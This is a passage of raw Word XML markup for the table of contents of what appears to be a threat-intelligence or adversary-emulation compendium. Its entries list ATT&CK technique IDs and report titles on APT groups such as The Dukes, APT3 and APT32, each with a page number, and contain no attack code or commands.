              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480853" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.6.1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_Toc153480853 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F416CFE" w14:textId="7E5A2892" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480854" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.6.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1156.001, T1078 - OPERATION GHOST The Dukes aren’t back — they never left</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480854 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BFF2609" w14:textId="1E3AF699" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480855" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.6.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1156.001 OPERATION GHOST The Dukes aren’t back — they never left</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480855 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06631857" w14:textId="1F819122" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480856" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.6.4</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1156.001, PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs – Wave 2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480856 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22A978D4" w14:textId="744DAAA1" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480857" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.6.5</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1156.001, T1078 - OPERATION GHOST The Dukes aren’t back — they never left</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480857 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A8D31D5" w14:textId="67661224" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480858" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.7</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT 3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480858 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75BDA9E4" w14:textId="7581CC54" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480859" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.7.1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_Toc153480859 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="082B9727" w14:textId="5BA809FB" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480860" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.7.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 – APT3 Emulation - Phase 1 – Initial Compromise - Spear Phishing with Malicious RAR Attachment</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480860 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B526872" w14:textId="7BA9E3BC" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480861" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.7.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1078.002 - Buckeye cyberespionage group shifts gaze from US to Hong Kong</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480861 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="737D9682" w14:textId="6F213FDA" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480862" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.7.4</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480862 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3403E2CD" w14:textId="2DB65A46" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480863" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.8</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT32</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480863 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1420A9C4" w14:textId="0CDE3731" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480864" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.8.1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_Toc153480864 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="441D8F22" w14:textId="7550EB5D" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480865" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.8.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - Operation Cobalt Kitty Attack Lifecycle</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480865 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D08D767" w14:textId="27B1E202" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
